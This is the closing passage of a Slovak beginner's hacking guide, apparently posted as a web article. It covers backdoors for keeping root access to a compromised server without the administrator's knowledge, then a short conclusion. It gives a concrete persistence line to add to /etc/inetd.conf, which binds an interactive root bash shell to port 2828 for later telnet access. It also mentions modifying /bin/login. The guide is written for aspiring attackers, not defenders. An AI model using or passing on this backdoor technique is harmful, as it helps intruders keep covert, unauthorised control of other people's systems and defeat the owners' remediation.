vsetko dalo by sa toho napisat ovela viac ale ako bolo povedane postupnym spoznavanim linuxu sa vsetko naucite Backdoor – zadne vratka

Dajme tomu ze sme hackli konto roota na niejakom serveri ale co ked root na to pride, zmeni si heslo a zaplata system ??? uz potom by nam neostavalo nic ine ako hladat dalsie chybycky na serveri aby sme tomu zabranili musime si nainstalovat niejaky backdoor. Backdoor je niejaka bezpecnostna diera sluziaca k pristupu do systemu bez vedomia administratora (roota). Existuju mnozstvo roznych backdoorov. Ako backdoor moze byt niejaky prerobeny systemovy program , alebo len pridanych par riadkov kodu do /bin/login. Na internete najdete rozne backdoory ktore su volne stiahnutelne Pre priklad sa pozrieme na jeden maly konfiguracny backdoor …

Do suboru /etc/inetd.conf pridame tento jednoduchy riadok 2828 stream tcp nowait root /usr/sbin/tcpd /bin/bash -i

ak root si zmeni heslo staci sa nam telnetnut na port 2828 a spusti sa nam shell (o: Nebudem vobec vysvetlovat co sme teraz urobili uz trosilinku pokrocili linuxaci vedia naco sluzi konfiguracny subor inetd.conf a co znamena cely vyssie napisany riadok !!! Ak nie tak znamena ze ste z linuxu duty a sup sup zohnat textiky a ucit sa… saq to nieje prirucka o linuxe ale o hackovani … to bol iba jeden velmi malicky priklad zadnych vratok.. existuju ovela zlozitejsie backdoory !!! ale tato prirucka je len pre zacinajucich hackerov (o: O backdoorov by to bolo zatial vsetko … Zaver

A je tu zaver … dufam ze vam tota prirucka pomohla Urcite po precitani tejto prirucky sa nestanete hackermi … nato vam tato prirucka nepomoze .. neostava vam nic ine iba ucit sa ucit sa a ucit sa Sledujte vsetke stranky ktore sa venuju bezpecnosti, linuxe … vlastne citajte vsetko vsetulinko co vam pride pod ruky a co vas zaujima … ** UPOZORNENIE: Tuto prirucku napisal Stegy mozes ju sirit, kopirovat,hodit si ju na svoju page len nesmies menit obsah ! a pytat za nu peniazky !!! POTOM JE TO TRESTNE A NEBEZPECNE!** A ešte jedna vec diakritika tu chýba, su tu chyby ale malo by vám to pomoct. 

««« Predchádzajúci text: 2 Mesiace prevádzky Následujúci text: Zaujíma ma váš názor! »»»

Páčil sa vám článok? Ohodnoťte ho!

Páčil sa vám článok? Zalinkujte ho!